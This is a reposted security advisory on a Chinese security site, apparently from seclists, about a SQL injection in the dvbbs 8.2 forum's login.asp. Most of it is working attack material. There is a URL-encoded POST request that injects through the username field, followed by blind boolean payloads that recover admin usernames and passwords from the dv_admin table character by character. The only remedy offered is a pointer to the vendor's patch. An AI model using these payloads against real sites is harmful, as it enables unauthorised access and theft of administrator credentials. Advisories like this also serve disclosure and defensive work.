dvbbs8.2(access/sql)version login.asp remote sql injection 's

admin 2017年5月8日17:23:25评论413 views字数 1020阅读3分24秒阅读模式
摘要

来源:seclistsemail:
hackerb_at_hotmail.comSubject:
dvbbs8.2(access/sql)version login.asp remote sql injection

来源:seclists

email:
hackerb_at_hotmail.com

Subject:
dvbbs8.2(access/sql)version login.asp remote sql injection

danger level:
critical/High

info:
dvbbs is prone to multiple sql injection security flaw

interrelated code to access version(exp):
password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25271

Examples(access version):
decide
Where and 1=1
where and 1=2
to get usernamer or password
where’ and 1=(select count(*) from dv_admin where left(username,1)=’a’) and ‘1’=’1
where’ and 1=(select count(*) from dv_admin where left(username,2)=’ad’) and ‘1’=’1
…………………..
…………………..
where’ and 1=(select count(*) from dv_admin where left(password,1)=’1′) and ‘1’=’1
where’ and 1=(select count(*) from dv_admin where left(password,2)=’15’) and ‘1’=’1
………………….
………………….

Solution:
Authorities patch
dvbbs web site(http://www.dvbbs.net)

References:
dvbbs(http://www.dvbbs.net)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年5月8日17:23:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   dvbbs8.2(access/sql)version login.asp remote sql injection 'shttp://cn-sec.com/archives/47872.html

发表评论

匿名网友 填写信息